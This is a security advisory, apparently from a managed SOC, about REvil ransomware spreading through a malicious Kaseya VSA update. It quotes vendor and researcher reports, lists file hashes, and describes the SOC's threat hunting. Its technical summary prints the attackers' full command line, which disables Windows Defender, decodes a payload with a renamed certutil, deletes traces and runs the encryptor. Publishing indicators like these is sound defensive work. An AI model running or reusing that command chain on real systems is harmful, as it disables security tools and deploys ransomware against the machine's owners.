REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update
Posted Date: 07/02/2021
Published Date: 07/02/2021
Source: Kaseya
Sector: Information Technology & Information Security
DATE(S) ISSUED: 07/02/2021
SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group
OVERVIEW: “The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.
The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.
MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.
While at the time of writing, it is unclear how widespread the incident is, security firm Huntress Labs is reporting that at least four MSPs have been hit so far. However, VSA is also used by regular businesses to manage large computer fleets, meaning the incident is also most likely impacting non-MSP entities as well.
According to security firm Sophos, which has also detected the attack via its antivirus telemetry, victims appear to be getting infected with ransomware via a malicious update to Kaseya VSA on-prem servers that disables local antivirus solutions and then deploys a fake Windows Defender app that encrypts local files.”
THREAT INTELLIGENCE: “We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say "Kaseya has been hacked" without evidence.”
Kaseya's official recommendation is to: "IMMEDIATELY shutdown your VSA server until you receive further notice from us.
We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. Its critical that you do this immediately, because one of the first things the attacker does is shutoff administrative access to the VSA.”
SYSTEMS AFFECTED: Kaseya VSA Servers - Windows
RISK: Managed Service Providers (MSPs) or companies that provide remote IT services to other companies or access to remote systems are affected by this threat.
Kaseya VSA is also used by regular businesses that are sized medium and large. Meaning this attack is not limited to MSPs only, but non-MSP entities as well.
TECHNICAL SUMMARY: Here's validated indicators of compromise known at this time: Ransomware encryptor is dropped to c:\kworking\agent.exe The VSA procedure is named "Kaseya VSA Agent Hot-fix” At least two tasks run the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Other possible Indicators of Compromise (IOCs) identified: VirusTotal MD5 561cffbaba71a6e8cc1cdceda990ead4 SHA-1 5162f14d75e96edb914d1756349d6e11583db0b0 SHA-256 d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e Vhash 095056655d15656az47!z Authentihash c9d30e7bf92c0bb67331c3526580a45d8446c785e4c671f55c957f53b285158f Imphash 59349b1648eddf021c01f05a17a0e870 Rich PE header hash 60c050aad9e163c9893ac438cc74b2bf SSDEEP 24576:vMz7ETDWX4XukZeVL/kYx9P/JY6gfjcsAE:kfF7k4pB/JYPIsAE TLSH T1D915BF03F6C199B2F5DF013960B2577E8D3AAE158729D9D39B9038668D312D06B3F389 File type Win32 EXE Magic PE32 executable for MS Windows (GUI) Intel 80386 32-bit TrID Windows Control Panel Item (generic) (88.3%) TrID Win64 Executable (generic) (4.7%) TrID Win16 NE executable (generic) (2.2%) TrID Win32 Executable (generic) (2%) TrID OS/2 Executable (generic) (0.9%) File size 890.88 KB (912264 bytes)
ACTIONS TAKEN: The CyFlare SOC is closely monitoring the situation as updates continue to arise from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down the entire SaaS architecture so they can examine everyone’s instances to be sure this is isolated to on-prem folks.
At this time, we do not believe any of our customers utilizing Kaseya is compromised at this time. This conclusion is the result of threat hunting searches performed looking for the indicators of compromise listed above into each affected customer’s environment/security solutions CyFlare manages.
For our managed endpoint or SentinelOne MDR customers we have also implemented a global blacklist on one key IOC identified. We added the SHA1 Hash identified as the Kaseya VSA Ransomware Encryptor Hash to the blacklist.
As more details for this emerging threat arise through the Cyber community or through Kaseya notices, your SOC will continue to address. If there any further updates, or indication that one of our affected customers are compromise then we will engage you further immediately.
If you have any further questions, comments, or concerns regarding this threat then please do not hesitate in contacting your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.